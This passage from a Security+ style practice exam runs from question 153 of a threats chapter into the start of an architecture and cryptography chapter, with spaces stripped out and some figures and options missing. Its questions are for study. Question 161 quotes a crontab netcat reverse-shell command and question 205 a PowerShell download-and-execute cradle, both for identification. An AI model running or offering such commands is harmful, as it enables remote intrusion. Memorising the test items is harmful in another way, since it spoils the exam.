C. Adirectoryrecursionattack

D. Aslashdotattack

153. WhatisthekeydifferentiatorbetweenSOARandSIEMsystems?


A. SOARintegrateswithawiderrangeofapplications.

B. SIEMincludesthreatandvulnerabilitymanagementtools.

C. SOARincludessecurityoperationsautomation.

D. SIEMincludessecurityoperationsautomation.

154. Yourcompanyhashiredapenetrationtestingfirmtotestthenetwork.Forthetest,youhavegiventhecompanydetailsonoperatingsystemsyouuse,applicationsyourun,andnetworkdevices.Whatbestdescribesthistypeoftest?

A. Knownenvironmenttest

B. Externaltest

C. Unknownenvironmenttest

D. Threattest

155. Whattwofilesarecommonlyattackedusingofflinebrute-forceattacks?

A. TheWindowsregistryandtheLinux/etc/passwdfile

B. TheWindowsSAMandtheLinux/etc/passwdfile

C. TheWindowsSAMandtheLinux/etc/shadowfile

D. TheWindowsregistryandtheLinux/etc/shadowfile

156. WhattypeofattackisanSSLstrippingattack?

A. Abrute-forceattack

B. ATrojanattack

C. Anon-pathattack

D. Adowngradeattack

157. WhattypeofattackistheU.S.TrustedFoundryprogramintendedtohelpprevent?

A. Criticalinfrastructureattacks

B. Metalworkandcastingattacks

C. Supplychainattacks

D. Softwaresourcecodeattacks


158. Nicolewantstoshowthemanagementinherorganizationreal-timedataaboutattacksfromaroundtheworldviamultipleserviceprovidersinavisualway.Whattypeofthreatintelligencetoolisoftenusedforthispurpose?

A. Apiechart

B. Athreatmap

C. Adarkwebtracker

D. AnOSINTrepository

159. Youhavenoticedthatwheninacrowdedarea,datafromyourcellphoneisstolen.LaterinvestigationshowsaBluetoothconnectiontoyourphone,onethatyoucannotexplain.Whatdescribesthisattack?

A. Bluejacking

B. Bluesnarfing

C. Eviltwin

D. RAT

160. Thetypeandscopeoftesting,clientcontactdetails,howsensitivedatawillbehandled,andthetypeandfrequencyofstatusmeetingsandreportsareallcommonelementsofwhatartifactofapenetrationtest?

A. Theblack-boxoutline

B. Therulesofengagement

C. Thewhite-boxoutline

D. Theclose-outreport

161. AmandaencountersaBashscriptthatrunsthefollowingcommand:

crontab-e0****ncexample.com8989-e/bin/bash

Whatdoesthiscommanddo?

A. Itchecksthetimeeveryhour.

B. Itpullsdatafromexample.comeveryminute.

C. Itsetsupareverseshell.

D. Noneoftheabove


http://example.com

162. ApenetrationtestercalledahelpdeskstaffmemberatthecompanythatCharlesworksatandclaimedtobeaseniorexecutivewhoneededherpasswordchangedimmediatelyduetoanimportantmeetingtheyneededtoconductthatwouldstartinafewminutes.Thestaffmemberchangedtheexecutive'spasswordtoapasswordthatthepenetrationtesterprovided.Whatsocialengineeringprincipledidthepenetrationtesterleveragetoaccomplishthisattack?

A. Intimidation

B. Scarcity

C. Urgency

D. Trust

163. Patrickhassubscribedtoacommercialthreatintelligencefeedthatisonlyprovidedtosubscriberswhohavebeenvettedandwhopayamonthlyfee.Whatindustrytermisusedtorefertothistypeofthreatintelligence?

A. Proprietarythreatintelligence

B. OSINT

C. ELINT

D. Corporatethreatintelligence

164. Whatthreathuntingconceptinvolvesthinkinglikeamaliciousactortohelpidentifyindicatorsofcompromisethatmightotherwisebehidden?

A. Intelligencefusion

B. Maneuver

C. Threatfeedanalysis

D. Bulletinanalysis

165. Whattypeofmaliciousactorwilltypicallyhavetheleastamountofresourcesavailabletothem?

A. Nation-states

B. Scriptkiddies

C. Hacktivists

D. Organizedcrime


166. ASYNfloodseekstooverwhelmasystembytyingupalltheopensessionsthatitcancreate.Whattypeofattackisthis?

A. ADDoS

B. Aresourceexhaustionattack

C. Anapplicationexploit

D. Avulnerabilityexploit

167. ApenetrationtestercallsastaffmemberforhertargetorganizationandintroducesherselfasamemberoftheITsupportteam.Sheasksifthestaffmemberhasencounteredaproblemwiththeirsystem,thenproceedstoaskfordetailsabouttheindividual,claimingsheneedstoverifythatsheistalkingtotherightperson.Whattypeofsocialengineeringattackisthis?

A. Pretexting

B. Awateringholeattack

C. Prepending

D. Shouldersurfing

168. Whattermdescribestheuseofairplanesordronestogathernetworkorotherinformationaspartofapenetrationtestorintelligencegatheringoperation?

A. Droning

B. AirSnarfing

C. Warflying

D. Aerialsnooping

169. Gabbywantstoprotectalegacyplatformwithknownvulnerabilities.Whichofthefollowingisnotacommonoptionforthis?

A. Disconnectitfromthenetwork.

B. Placethedevicebehindadedicatedfirewallandrestrictinboundandoutboundtraffic.

C. RelyontheoutdatedOStoconfuseattackers.

D. MovethedevicetoaprotectedVLAN.

170. IntheUnitedStates,collaborativeindustryorganizationsthatanalyzeand


sharecybersecuritythreatinformationwithintheirindustryverticalsareknownbywhatterm?

A. IRTs

B. ISACs

C. Feedburners

D. Verticalthreatfeeds

171. Afterrunningnmapagainstasystemonanetwork,LuccaseesthatTCPport23isopenandaserviceisrunningonit.Whatissueshouldheidentify?

A. LowportsshouldnotbeopentotheInternet.

B. Telnetisaninsecureprotocol.

C. SSHisaninsecureprotocol.

D. Ports1-1024arewell-knownportsandmustbefirewalled.

172. Duringapenetrationtest,CamerongainsphysicalaccesstoaWindowssystemandusesasystemrepairdisktocopycmd.exetothe%systemroot%\system32directorywhilerenamingitsethc.exe.Whenthesystemboots,heisabletologinasanunprivilegeduser,hittheShiftkeyfivetimes,andopenacommandpromptwithsystem-levelaccessusingstickykeys.Whattypeofattackhasheconducted?

A. ATrojanattack

B. Aprivilegeescalationattack

C. Adenial-of-serviceattack

D. Aswapfileattack

173. Adamwantstodescribethreatactorsusingcommonattributes.Whichofthefollowinglistisnotacommonattributeusedtodescribethreatactors?

A. Internal/external

B. Resourcesorfundinglevel

C. Yearsofexperience

D. Intent/motivation

174. Madhuriisconcernedaboutthesecurityofthemachinelearningalgorithms


thatherorganizationisdeploying.Whichofthefollowingoptionsisnotacommonsecurityprecautionformachinelearningalgorithms?

A. Ensuringthesourcedataissecureandofsufficientquality

B. Requiringathird-partyreviewofallproprietaryalgorithms

C. Requiringchangecontrolanddocumentationforallchangestothealgorithms

D. Ensuringasecureenvironmentforalldevelopment,dataacquisition,andstorage

175. Frankispartofawhiteteamforacybersecurityexercise.Whatrolewillheandhisteamhave?

A. Performingoversightandjudgingoftheexercise

B. Providingfulldetailsoftheenvironmenttotheparticipants

C. Providingpartialdetailsoftheenvironmenttotheparticipants

D. Providingdefenseagainsttheattackersintheexercise

176. Susanreceives$10,000forreportingavulnerabilitytoavendorwhoparticipatesinaprogramtoidentifyissues.Whattermiscommonlyusedtodescribethistypeofpayment?

A. Aransom

B. Apayday

C. Abugbounty

D. Azero-daydisclosure

177. Charlessetsthepermissionsonthe/etcdirectoryonaLinuxsystemto777usingthechmodcommand.IfAlexlaterdiscoversthis,whatshouldhereporthisfindingas?

A. Openorweakpermissions

B. Improperfilehandling

C. Aprivilegeescalationattack

D. Noneoftheabove

178. Duringapenetrationtest,Kathleengathersinformation,includingtheorganization'sdomainname,IPaddresses,employeeinformation,phone


numbers,emailaddresses,andsimilardata.Whatisthisprocesstypicallycalled?

A. Mapping

B. Footprinting

C. Fingerprinting

D. Aggregation

179. Whattermisusedtodescribemappingwirelessnetworkswhiledriving?

A. Wi-driving

B. Traffictesting

C. Wardriving

D. CARINT

180. Freddiscoversthatthelightingandutilitycontrolsystemsforhiscompanyhavebeenoverwhelmedbytrafficsenttothemfromhundredsofexternalnetworkhosts.Thishasresultedinthelightsandutilitysystemmanagementsystemsnotreceivingappropriatereporting,andtheendpointdevicescannotreceivecommands.Whattypeofattackisthis?

A. ASCADAoverflow

B. Anoperationaltechnology(OT)DDoS

C. AnetworkDDoS

D. AnapplicationDDoS

181. Benrunsavulnerabilityscanusingup-to-datedefinitionsforasystemthatheknowshasavulnerabilityintheversionofApachethatitisrunning.Thevulnerabilityscandoesnotshowthatissuewhenhereviewsthereport.WhathasBenencountered?

A. Asilentpatch

B. Amissingvulnerabilityupdate

C. Afalsenegative

D. Afalsepositive

182. Whattypeoftechniqueiscommonlyusedbymalwarecreatorstochangethesignatureofmalwaretoavoiddetectionbyantivirustools?


A. Refactoring

B. Cloning

C. Manualsourcecodeediting

D. Changingprogramminglanguages

183. Whattermdescribesamilitarystrategyforpoliticalwarfarethatcombinesconventionalwarfare,irregularwarfare,andcyberwarfarewithfakenews,socialmediainfluencestrategies,diplomaticefforts,andmanipulationoflegalactivities?

A. Socialwarfare

B. Hybridwarfare

C. Socialinfluence

D. Cybersocialinfluencecampaigns

184. ChrisisnotifiedthatoneofhisstaffwaswarnedviaatextmessagethattheFBIisawarethattheyhaveaccessedillegalwebsites.Whattypeofissueisthis?

A. Aphishingattempt

B. Identityfraud

C. Ahoax

D. Aninvoicescam

185. SarahisreviewingthelogsforherwebserverandseesanentryflaggedforreviewthatincludesthefollowingHTTPrequest:

CheckinstockAPI=http://localhost/admin.php

Whattypeofattackismostlikelybeingattempted?

A. Across-sitescriptingattack

B. Server-siderequestforgery

C. Client-siderequestforgery

D. SQLinjection

186. Angelareviewsbulletinsandadvisoriestodeterminewhatthreatsherorganizationislikelytoface.Whattypeofactivityisthisassociatedwith?


A. Incidentresponse

B. Threathunting

C. Penetrationtesting

D. Vulnerabilityscanning

187. Whydoattackerstargetpasswordsstoredinmemory?

A. Theyareencryptedinmemory.

B. Theyarehashedinmemory.

C. Theyareofteninplaintext.

D. Theyareoftende-hashedforuse.

188. TheU.S.DepartmentofHomelandSecurity(DHS)providesanautomatedindicatorsharing(AIS)servicethatallowsforthefederalgovernmentandprivatesectororganizationstosharethreatdatainrealtime.TheAISserviceusesopensourceprotocolsandstandardstoexchangethisinformation.WhichofthefollowingstandardsdoestheAISserviceuse?

A. HTMLandHTTPS

B. SFTPandXML

C. STIXandTRIX

D. STIXandTAXII

189. Duringwhatphaseofapenetrationtestisinformationlikeemployeenames,phonenumber,andemailaddressesgathered?

A. Exploitation

B. Establishingpersistence

C. Reconnaissance

D. Lateralmovement

190. Duringapenetrationtest,Angelaobtainstheuniformofawell-knownpackagedeliveryserviceandwearsitintothetargetoffice.SheclaimstohaveadeliveryforaC-levelemployeesheknowsisthereandinsiststhatthepackagemustbesignedforbythatperson.Whatsocialengineeringtechniquehassheused?

A. Impersonation


B. Whaling

C. Awateringholeattack

D. Prepending

191. Nickpurchaseshisnetworkdevicesthroughagraymarketsupplierthatimportsthemintohisregionwithoutanofficialrelationshipwiththenetworkdevicemanufacturer.WhatriskshouldNickidentifywhenheassesseshissupplychainrisk?

A. Lackofvendorsupport

B. Lackofwarrantycoverage

C. Inabilitytovalidatethesourceofthedevices

D. Alloftheabove

192. ChristinawantstoidentifyindicatorsofattackforXML-basedwebapplicationsthatherorganizationruns.WhereisshemostlikelytofindinformationthatcanhelpherdeterminewhetherXMLinjectionisoccurringagainstherwebapplications?

A. Syslog

B. Webserverlogs

C. Authenticationlogs

D. Eventlogs

193. WhatcanFrankdotodetermineifheissufferingfromadenial-of-service(DoS)attackagainsthiscloudhostingenvironment?

A. Nothing;cloudservicesdonotprovidesecuritytools.

B. CallthecloudserviceprovidertohavethemstoptheDoSattack.

C. Reviewthecloudserviceprovider'ssecuritytoolsandenableloggingandanti-DoStoolsiftheyexist.

D. Callthecloudserviceprovider'sInternetserviceprovider(ISP)andaskthemtoenableDoSprevention.

194. Frankisusingthecloudhostingservice'swebpublishingserviceratherthanrunninghisownwebservers.WherewillFrankneedtolooktoreviewhislogstoseewhattypesoftraffichisapplicationiscreating?


A. Syslog

B. Apachelogs

C. Thecloudservice'sweblogs

D. Noneoftheabove

195. IfFrankwerestilloperatinginhison-siteinfrastructure,whichofthefollowingtechnologieswouldprovidethemostinsightintowhattypeofattackhewasseeing?

A. Afirewall

B. AnIPS

C. Avulnerabilityscanner

D. Antimalwaresoftware

196. Alainawantstoensurethattheon-sitesystemintegrationthatavendorthathercompanyisworkingwithisdoneinaccordancewithindustrybestpractices.Whichofthefollowingisnotacommonmethodofensuringthis?

A. Insertingsecurityrequirementsintocontracts

B. Auditingconfigurations

C. Coordinatingwiththevendorforsecurityreviewsduringandafterinstallation

D. RequiringanSOCreport

197. EliashasimplementedanAI-basednetworktrafficanalysistoolthatrequireshimtoallowthetooltomonitorhisnetworkforaperiodoftwoweeksbeforebeingputintofullproduction.WhatisthemostsignificantconcernheneedstoaddressbeforeusingtheAI'sbaseliningcapabilities?

A. Thenetworkshouldbeisolatedtopreventoutboundtrafficfrombeingaddedtothenormaltrafficpatterns.

B. Compromisedorotherwisemaliciousmachinescouldbeaddedtothebaselineresultingintaintedtrainingdata.

C. Trafficpatternsmaynotmatchtrafficthroughoutalongertimeframe.

D. TheAImaynotunderstandthetrafficflowsinhisnetwork.

198. Whatisthetypicalgoalintentorgoalofhacktivists?


A. Increasingtheirreputation

B. Financialgain

C. Makingapoliticalstatement

D. Gatheringhigh-valuedata

199. Wheredoestheinformationforpredictiveanalysisforthreatintelligencecomefrom?

A. Currentsecuritytrends

B. Largesecuritydatasets

C. Behaviorpatterns

D. Alloftheabove

200. SocialSecuritynumbersandotherpersonalinformationareoftenstolenforwhatpurpose?

A. Blackmail

B. Tailgating

C. Identityfraud

D. Impersonation

201. Securityorchestration,automation,andresponse(SOAR)toolshavethreemajorcomponents.Whichofthefollowingisnotoneofthosecomponents?

A. Sourcecodesecurityanalysisandtesting

B. Threatandvulnerabilitymanagement

C. Securityincidentresponse

D. Securityoperationsautomation

202. Directaccess,wireless,email,supplychain,socialmedia,removablemedia,andcloudareallexamplesofwhat?

A. Threatintelligencesources

B. Threatvectors

C. Attributesofthreatactors

D. Vulnerabilities


203. SourceForgeandGitHubarebothexamplesofwhattypeofthreatintelligencesource?

A. Thedarkweb

B. Automatedindicatorsharingsources

C. Fileorcoderepositories

D. Publicinformationsharingcenters

204. Whatistherootcauseofimproperinputhandling?

A. Impropererrorhandling

B. Trustingratherthanvalidatingdatainputs

C. Lackofuserawareness

D. Impropersourcecodereview

205. ClairediscoversthefollowingPowerShellscript.Whatdoesitdo?

powershell.exe-epBypass-nop-noexit-ciex

((NewObjectNet.WebClient).

DownloadString('https://example.com/file.psl))

A. Downloadsafileandopensaremoteshell

B. Uploadsafileanddeletesthelocalcopy

C. Downloadsafileintomemory

D. Uploadsafilefrommemory

206. Kathleen'sIPSflagstrafficfromtwoIPaddressesasshownhere:

SourceIP:10.11.94.111

http://example.com/home/show.php?SESSIONID=a3fghbby

SourceIP:192.168.5.34

http://example.com/home/show.php?SESSIONID=a3fghbby

Whattypeofattackshouldsheinvestigatethisas?

A. ASQLinjectionattack

B. Across-sitescriptingattack

C. Asessionreplayattack


D. Aserver-siderequestforgeryattack

207. TherearesevenimpactcategoriesthatyouneedtoknowfortheSecurity+exam.Whichofthefollowingisnotoneofthem?

A. Databreaches

B. Datamodification

C. Dataexfiltration

D. Dataloss

208. Whichofthefollowingresearchsourcesistypicallytheleasttimelywhensourcingthreatintelligence?

A. Vulnerabilityfeeds

B. Localindustrygroups

C. Academicjournals

D. Threatfeeds

209. Whilereviewingauthlogsonaserverthatshemaintains,Megannoticesthefollowinglogentries:

Apr2620:01:32examplesysrshd[6101]:Connectionfrom

10.0.2.15onillegalport











Apr2620:02:35examplesysrlogind[6189]:Connectionfrom


Whathasshemostlikelydetected?

A. Asuccessfulhackingattempt

B. Afailedservicestartup

C. Avulnerabilityscan


D. Asystemreboot

210. ThefollowinggraphicshowsareportfromanOpenVASvulnerabilityscan.WhatshouldCharlesdofirsttodeterminethebestfixforthevulnerabilityshown?

A. DisablePHP-CGI.

B. UpgradePHPtoversion5.4.

C. ReviewthevulnerabilitydescriptionsintheCVEslisted.

D. Disablethewebserver.

211. Ianrunsavulnerabilityscan,whichnotesthataserviceisrunningonTCP


port8080.Whattypeofserviceismostlikelyrunningonthatport?

A. SSH

B. RDP

C. MySQL

D. HTTP

212. RickrunsWPScanagainstapotentiallyvulnerableWordPressinstallation.WPScanisawebapplicationsecurityscannerdesignedspecificallyforWordPresssites.Aspartofthescanresults,henoticesthefollowingentry:

WhatshouldRickdoafterremediatingthisvulnerability?

A. Installawebapplicationfirewall.

B. ReviewthepatchingandupdatingprocessfortheWordPresssystem.

C. Searchforothercompromisedsystems.

D. ReviewIPSlogsforattacksagainstthevulnerableplug-in.

213. CarolynrunsavulnerabilityscanofanetworkdeviceanddiscoversthatthedeviceisrunningservicesonTCPports22and443.Whatserviceshasshemostlikelydiscovered?

A. Telnetandawebserver

B. FTPandaWindowsfileshare

C. SSHandawebserver


D. SSHandaWindowsfileshare

214. Ryanneedstoverifythatnounnecessaryportsandservicesareavailableonhissystems,buthecannotrunavulnerabilityscanner.Whatishisbestoption?

A. Passivenetworktrafficcapturetodetectservices

B. Aconfigurationreview

C. Activenetworktrafficcapturetodetectservices

D. Logreview

215. Whyisimpropererrorhandlingforwebapplicationsthatresultsindisplayingerrormessagesconsideredavulnerabilitythatshouldberemediated?

A. Errorscanbeusedtocrashthesystem.

B. Manyerrorsresultinraceconditionsthatcanbeexploited.

C. Manyerrorsprovideinformationaboutthehostsystemoritsconfiguration.

D. Errorscanchangesystempermissions.

216. SomeusersonyournetworkuseAcmeBankfortheirpersonalbanking.Thoseusershaveallrecentlybeenthevictimofanattack,inwhichtheyvisitedafakeAcmeBankwebsiteandtheirloginswerecompromised.Theyallvisitedthebankwebsitefromyournetwork,andalloftheminsisttheytypedinthecorrectURL.Whatisthemostlikelyexplanationforthissituation?

A. Trojanhorse

B. IPspoofing

C. Clickjacking

D. DNSpoisoning

217. JohnisanetworkadministratorforAcmeCompany.Hehasdiscoveredthatsomeonehasregisteredadomainnamethatisspelledjustoneletterdifferentthanhiscompany'sdomain.ThewebsitewiththemisspelledURLisaphishingsite.Whatbestdescribesthisattack?

A. Sessionhijacking



C. Typosquatting

D. Clickjacking


Chapter2ArchitectureandDesign


2.1 Explaintheimportanceofsecurityconceptsinanenterpriseenvironment

2.2 Summarizevirtualizationandcloudcomputingconcepts

2.3 Summarizesecureapplicationdevelopment,deployment,andautomationconcepts

2.4 Summarizeauthenticationandauthorizationdesignconcepts

2.5 Givenascenario,implementcybersecurityresilience

2.6 Explainthesecurityimplicationsofembeddedandspecializedsystems

2.7 Explaintheimportanceofphysicalsecuritycontrols

2.8 Summarizethebasicsofcryptographicconcepts

1. Benisreviewingconfigurationmanagementdocumentationforhisorganizationandfindsthefollowingdiagraminhiscompany'sdocumentrepository.Whatkeyinformationismissingfromthediagramthatasecurityprofessionalwouldneedtobuildfirewallrulesbasedonthediagram?

A. Thesubnetmask


B. Theservicename

C. Theprotocolthetrafficuses

D. TheAPIkey

2. Youareresponsiblefornetworksecurityatane-commercecompany.Youwanttoensurethatyouareusingbestpracticesforthee-commercewebsiteyourcompanyhosts.Whatstandardwouldbethebestforyoutoreview?

A. OWASP

B. NERC

C. TrustedFoundry

D. ISA/IEC

3. Cherylisresponsibleforcybersecurityatamid-sizedinsurancecompany.Shehasdecidedtouseadifferentvendorfornetworkantimalwarethansheusesforhostantimalware.Isthisarecommendedaction,andwhyorwhynot?

A. Thisisnotrecommended;youshoulduseasinglevendorforaparticularsecuritycontrol.

B. Thisisrecommended;thisisdescribedasvendordiversity.

C. Thisisnotrecommended;thisisdescribedasvendorforking.

D. Itisneutral.Thisdoesnotimproveordetractfromsecurity.

4. Scottwantstobackupthecontentsofanetwork-attachedstorage(NAS)deviceusedinacriticaldepartmentinhiscompany.Heisconcernedabouthowlongitwouldtaketorestorethedeviceifasignificantfailurehappened,andheislessconcernedabouttheabilitytorecoverintheeventofanaturaldisaster.Giventheserequirements,whattypeofbackupshouldheusefortheNAS?

A. Atape-basedbackupwithdailyfullbackups

B. AsecondNASdevicewithafullcopyoftheprimaryNAS

C. Atape-basedbackupwithnightlyincrementalbackups

D. Acloud-basedbackupservicethatuseshighdurabilitynear-linestorage

5. Yasmineisrespondingtoafulldatacenteroutage,andafterreferencingthe


documentationforthesystemsinthedatacentershebringsthenetworkbackup,thenfocusesonthestorageareanetwork(SAN),followedbythedatabaseservers.Whydoesherorganizationlistsystemsforhertobringbackonlineinaparticularseries?

A. Thepowersupplyforthebuildingcannothandleallthedevicesstartingatonce.

B. Theorganizationwantstoensurethatasecondoutagedoesnotoccurduetofailedsystems.

C. Theorganizationwantstoensurethatsystemsaresecureandhavetheresourcestheyneedbyfollowingarestorationorder.

D. Thefiresuppressionsystemmayactivateduetothesuddenchangeinheat,causingsignificantdamagetothesystems.

6. Enriqueisconcernedaboutbackupdatabeinginfectedbymalware.Thecompanybacksupkeyserverstodigitalstorageonabackupserver.Whichofthefollowingwouldbemosteffectiveinpreventingthebackupdatabeinginfectedbymalware?

A. PlacethebackupserveronaseparateVLAN.

B. Air-gapthebackupserver.

C. Placethebackupserveronadifferentnetworksegment.

D. Useahoneynet.

7. WhattypeofattributeisaWindowspicturepassword?

A. Somewhereyouare

B. Somethingyouexhibit

C. Somethingyoucando

D. Someoneyouknow

8. Whichofthefollowingisnotacriticalcharacteristicofahashfunction?

A. Itconvertsvariable-lengthinputintoafixed-lengthoutput.

B. Multipleinputsshouldnothashtothesameoutput.

C. Itmustbereversible.

D. Itshouldbefasttocompute.


9. Naomiwantstohireathird-partysecuredatadestructioncompany.Whatprocessismostfrequentlyusedtoensurethatthirdpartiesproperlyperformdatadestruction?

A. Manualon-siteinspectionbyfederalinspectors

B. Contractualrequirementsandacsertificationprocess

C. Requiringpicturesofeverydestroyeddocumentordevice

D. Alloftheabove

10. Oliviawantstoensurethatthecodeexecutedaspartofherapplicationissecurefromtamperingandthattheapplicationitselfcannotbetamperedwith.Whichofthefollowingsolutionsshouldsheuseandwhy?

A. Server-sideexecutionandvalidation,becauseitpreventsdataandapplicationtampering

B. Client-sidevalidationandserver-sideexecutiontoensureclientdataaccess

C. Server-sidevalidationandclient-sideexecutiontopreventdatatampering

D. Client-sideexecutionandvalidation,becauseitpreventsdataandapplicationtampering

11. Trevorwantstouseaninexpensivedevicetobuildacustomembeddedsystemthatcanmonitoraprocess.Whichofthefollowingoptionsisbestsuitedforthisifhewantstominimizeexpenseandmaximizesimplicitywhileavoidingthepotentialforsystemordevicecompromise?

A. ARaspberryPi

B. AcustomFPGA

C. ArepurposeddesktopPC

D. AnArduino

12. AmandawantstouseadigitalsignatureonanemailsheissendingtoMaria.Whichkeyshouldsheusetosigntheemail?

A. Maria'spublickey

B. Amanda'spublickey

C. Maria'sprivatekey


D. Amanda'sprivatekey

13. Nickwantstomakeanencryptionkeyhardertocrack,andheincreasesthekeylengthbyonebitfroma128-bitencryptionkeytoa129-bitencryptionkeyasanexampletoexplaintheconcept.Howmuchmoreworkwouldanattackerhavetodotocrackthekeyusingbruteforceifnootherattacksortechniquescouldbeapplied?

A. Onemore

B. 129more

C. Twiceasmuch

D. Fourtimesasmuch

14. GurvinderknowsthattheOpenSSLpasswdfileprotectspasswordsbyusing1,000roundsofMD5hashingtohelpprotectpasswordinformation.Whatisthistechniquecalled?

A. Spinningthehash

B. Keyrotation

C. Keystretching

D. Hashiteration

15. Fredwantstomakeitharderforanattackertouserainbowtablestoattackthehashedpasswordvalueshestores.WhatshouldheaddtoeverypasswordbeforeitishashedtomakeitimpossiblefortheattackertosimplyusealistofcommonhashedpasswordstorevealthepasswordsFredhasstorediftheygainaccesstothem?

A. Asalt

B. Acipher

C. Aspice

D. Atrapdoor

16. IanwantstosendanencryptedmessagetoMichelleusingpublickeycryptography.Whatkeydoesheneedtoencryptthemessage?

A. Hispublickey

B. Hisprivatekey


C. Herpublickey

D. Herprivatekey

17. WhatkeyadvantagedoesanellipticalcurvecryptosystemhaveoveranRSA-basedcryptosystem?

A. Itcanuseasmallerkeylengthforthesameresistancetobeingbroken.

B. Itrequiresonlyasinglekeytoencryptanddecrypt.

C. Itcanrunonolderprocessors.

D. Itcanbeusedfordigitalsignaturesaswellasencryption.

18. Whatcryptographiccapabilityensuresthateveniftheserver'sprivatekeyiscompromised,thesessionkeyswillnotbecompromised?

A. Perfectforwardsecrecy

B. Symmetricencryption

C. Quantumkeyrotation

D. Diffie-Hellmankeymodulation

19. Alainaisreviewingpracticesforherreceptiondeskandwantstoensurethatthereceptiondesk'svisitorlogisaccurate.Whatprocessshouldsheaddtotheguard'scheck-inprocedure?

A. Checkthevisitor'sIDagainsttheirlogbookentry.

B. Performabiometricscantovalidatevisitoridentities.

C. Requiretwo-personintegritycontrol.

D. Replacetheguardwithasecurityrobot.

20. Inanattempttoobservehackertechniques,asecurityadministratorconfiguresanonproductionnetworktobeusedasatargetsothathecancovertlymonitornetworkattacks.Whatisthistypeofnetworkcalled?

A. Activedetection

B. Falsesubnet

C. IDS

D. Honeynet

21. Whattypeofsystemisusedtocontrolandmonitorpowerplantpower


generationsystems?

A. IPG

B. SEED

C. SCADA

D. ICD

22. Whatmajortechnicalcomponentofmoderncryptographicsystemsislikelytobesusceptibletoquantumattacks?

A. Keygeneration

B. Ellipticalplotalgorithms

C. Cubicrootcurvecryptography

D. Primefactorizationalgorithms

23. Geoffwantstoestablishacontractwithacompanytohavedatacenterspacethatisequippedandreadytogosothathecanbringhisdatatothelocationintheeventofadisaster.Whattypeofdisasterrecoverysiteishelookingfor?

A. Ahotsite

B. Acoldsite

C. Awarmsite

D. AnRTOsite

24. OlivianeedstoensureanIoTdevicedoesnothaveitsoperatingsystemmodifiedbythirdpartiesafteritissold.Whatsolutionshouldsheimplementtoensurethatthisdoesnotoccur?

A. Setadefaultpassword.

B. Requiresignedandencryptedfirmware.

C. ChecktheMD5sumfornewfirmwareversions.

D. Patchregularly.

25. Whatstatementisexpectedtobetrueforapost-quantumcryptographyworld?

A. Encryptionspeedwillbemeasuredinqubits.


B. Nonquantumcryptosystemswillnolongerbesecure.

C. Quantumencryptionwillnolongerberelevant.

D. Keylengthslongerthan4,096bitsusingRSAwillberequired.

26. Whatfunctiondoescountermodeperforminacryptographicsystem?

A. Itreversestheencryptionprocess.

B. Itturnsablockcipherintoastreamcipher.

C. Itturnsastreamcipherintoablockcipher.

D. Itallowspublickeystounlockprivatekeys.

27. Whichofthefollowingitemsisnotincludedinablockchain'spublicledger?

A. Arecordofallgenuinetransactionsbetweennetworkparticipants

B. Arecordofcryptocurrencybalances(orotherdata)storedintheblockchain

C. Theidentityoftheblockchainparticipants

D. Atokenthatidentifiestheauthorityunderwhichthetransactionwasmade

28. Suzanisresponsibleforapplicationdevelopmentinhercompany.Shewantstohaveallwebapplicationstestedbeforetheyaredeployedlive.Shewantstouseatestsystemthatisidenticaltotheliveserver.Whatisthiscalled?

A. Aproductionserver

B. Adevelopmentserver

C. Atestserver

D. Apredeploymentserver

29. Alexandraispreparingtorunautomatedsecuritytestsagainstthecodethatdevelopersinherorganizationhavecompleted.Whichenvironmentisshemostlikelytoruntheminifthenextstepistodeploythecodetoproduction?

A. Development

B. Test


C. Staging

D. Production

30. ChriswantstolimitwhocanuseanAPIthathiscompanyprovidesandbeabletologusageoftheAPIuniquelytoeachorganizationthattheyprovideaccessto.Whatsolutionismostoftenusedtodothis?

A. Firewallswithrulesforeachcompany'spublicIPaddress

B. Usercredentialsforeachcompany

C. APIkeys

D. APIpasswords

31. Derekhasbeenassignedtoassessthesecurityofsmartmeters.Whichofthefollowingisnotacommonconcernforanembeddedsystemlikeasmartmeter?

A. Eavesdropping

B. Denialofservice

C. Remotedisconnection

D. SQLinjection

32. Selahwantstoanalyzereal-worldattackpatternsagainstsystemssimilartowhatshealreadyhasdeployedinherorganization.Shewouldliketoseelocalcommandsonacompromisedsystemandhaveaccesstoanytoolsorothermaterialstheattackerswouldnormallydeploy.Whattypeoftechnologycouldsheusetodothis?

A. Ahoneypot

B. AnIPS

C. AnIDS

D. AWAF

33. Charlessetsupanetworkwithintentionalvulnerabilitiesandtheninstrumentsitsothathecanwatchattackersandcapturedetailsoftheirattacksandtechniques.WhathasCharlessetup?

A. Ablackhole

B. Ahoneyhole


C. Aspynet

D. Ahoneynet

34. Mariaisasecurityengineerwithamanufacturingcompany.Duringarecentinvestigation,shediscoveredthatanengineer'scompromisedworkstationwasbeingusedtoconnecttoSCADAsystemswhiletheengineerwasnotloggedin.TheengineerisresponsibleforadministeringtheSCADAsystemsandcannotbeblockedfromconnectingtothem.WhatshouldMariadotomitigatethisthreat?

A. Installhost-basedantivirussoftwareontheengineer'ssystem.

B. ImplementaccountusageauditingontheSCADAsystem.

C. ImplementanNIPSontheSCADAsystem.

D. UseFDEontheengineer'ssystem.

35. AESandDESareanexampleofwhattypeofcipher?

A. Streamciphersthatencryptgroupsofplain-textsymbolsalltogether

B. Blockciphersthatencryptgroupsofplain-textsymbolsalltogether

C. Streamciphersthatencryptoneplain-textsymbolatatime

D. Blockciphersthatencryptoneplain-textsymbolatatime

36. Gerardisresponsibleforsecurecommunicationswithhiscompany'se-commerceserver.AllcommunicationswiththeserveruseTLS.WhatisthemostsecureoptionforGerardtostoretheprivatekeyonthee-commerceserver?

A. HSM

B. FDE

C. SED

D. SDN

37. Whatpurposedoesatransitgatewayserveincloudservices?

A. Itconnectssystemsinsideofaclouddatacenter.

B. Itconnectsvirtualprivatecloudsandon-premisesnetworks.

C. ItprovidesanAPIgatewaybetweentrustzones.

D. Itallowsmulticloudinfrastructuredesigns.


38. Webdevelopersinyourcompanycurrentlyhavedirectaccesstotheproductionserverandcandeploycodedirectlytoit.Thiscanleadtounsecurecode,orsimplycodeflawsbeingdeployedtothelivesystem.Whatwouldbethebestchangeyoucouldmaketomitigatethisrisk?

A. Implementsandboxing.

B. Implementvirtualizedservers.

C. Implementastagingserver.

D. Implementdeploymentpolicies.

39. IanisconcernedaboutVoIPphonesusedinhisorganizationduetotheuseofSMSaspartoftheirmultifactorauthenticationrollout.Whattypeattackshouldhebeconcernedabout?

A. Avishingattack

B. Avoicemailhijack

C. AnSMStokenredirect

D. Aweakmultifactorcodeinjection

